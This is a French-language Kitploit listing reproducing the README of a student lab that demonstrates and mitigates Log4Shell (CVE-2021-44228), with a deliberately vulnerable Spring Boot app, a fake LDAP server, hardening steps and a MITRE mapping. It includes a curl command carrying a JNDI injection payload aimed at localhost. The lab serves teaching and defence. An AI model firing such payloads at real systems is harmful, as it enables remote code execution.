Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
log4shell-homework9 — Démonstration d'exploitation de Log4Shell (CVE-2021-44228) pour SEAS 8405. Comprend une application Spring Boot vulnérable, un faux serveur LDAP, une configuration Docker, un mapping MITRE, une réponse aux incidents et un enregistrement d'écran complet. | Kitploit
Outils/GitHubGitHub/serpilrivas/log4shell-homework9
Analyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationRéponse aux IncidentsLabs et Pratique
GitHubserpilrivas/log4shell-homework9

log4shell-homework9

Démonstration d'exploitation de Log4Shell (CVE-2021-44228) pour SEAS 8405. Comprend une application Spring Boot vulnérable, un faux serveur LDAP, une configuration Docker, un mapping MITRE, une réponse aux incidents et un enregistrement d'écran complet.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 1 anPas encore vérifié

Devoir 9 – Sécurisation des systèmes contre les exploits Log4Shell

Aperçu

Ce projet démontre l'exploitation et l'atténuation de la vulnérabilité Log4Shell (CVE-2021-44228) à l'aide d'une application web Java dockerisée avec Log4j 2.14.1 vulnérable. Le dispositif comprend également un serveur LDAP malveillant simulé pour démontrer le chemin d'attaque par injection JNDI.

Après l'exploitation, le système est durci en mettant à niveau Log4j, en validant les entrées et en appliquant les recommandations de MITRE D3FEND et ATT&CK.


Structure des dossiers

root@kitploit:~
log4shell-homework9/
├── docker-compose.yml
├── Dockerfile
├── pom.xml
├── ldap_server.py
├── src/...
├── architecture_diagram.png
├── README.md
├── mitigation_report.pdf

Comment exécuter

1. Construire l'application Java (avec Log4j vulnérable)

root@kitploit:~
docker build -t vulnerable-app .

2. Exécuter l'application avec Docker Compose

root@kitploit:~
docker-compose up

L'application sera accessible à l'adresse :
http://localhost:8080

3. Démarrer le faux serveur LDAP (dans un nouveau terminal)

root@kitploit:~
python3 ldap_server.py

4. Simuler un exploit

Envoyez une requête comme celle-ci à l'application :

root@kitploit:~
curl http://localhost:8080?input=${jndi:ldap://localhost:8000/Exploit}

Le serveur LDAP devrait recevoir la requête (cela simule l'exploit JNDI).


Comment le système est durci

Après avoir démontré l'attaque, le système a été sécurisé en :

  • Mettant à niveau Log4j vers la version 2.17.0
  • Validant les entrées (blocage des motifs ${jndi:...})
  • Désactivant les recherches de messages dans la configuration
  • Utilisant l'isolation Docker pour limiter la portée
  • Appliquant les techniques MITRE D3FEND & ATT&CK

Mappage MITRE

MITRE ATT&CK :

  • T1190 : Exploitation d'une application exposée publiquement
  • T1210 : Exploitation de services distants

MITRE D3FEND :

  • D3-IA : Validation des entrées
  • D3-HI : Détection d'intrusion basée sur l'hôte
  • D3-DA : Désactivation des fonctions non sécurisées

Rapport

Voir mitigation_report.pdf pour :

  • L'architecture du système avant/après
  • L'explication de Log4Shell
  • La stratégie d'atténuation
  • Le plan de réponse aux incidents

Enregistrement d'écran

Si la vidéo n'est pas téléchargée directement, elle est disponible via le lien dans le rapport.


Auteur

Serpil Rivas
SEAS 8405 – Architectures de cybersécurité
Mai 2025

Télécharger l’outil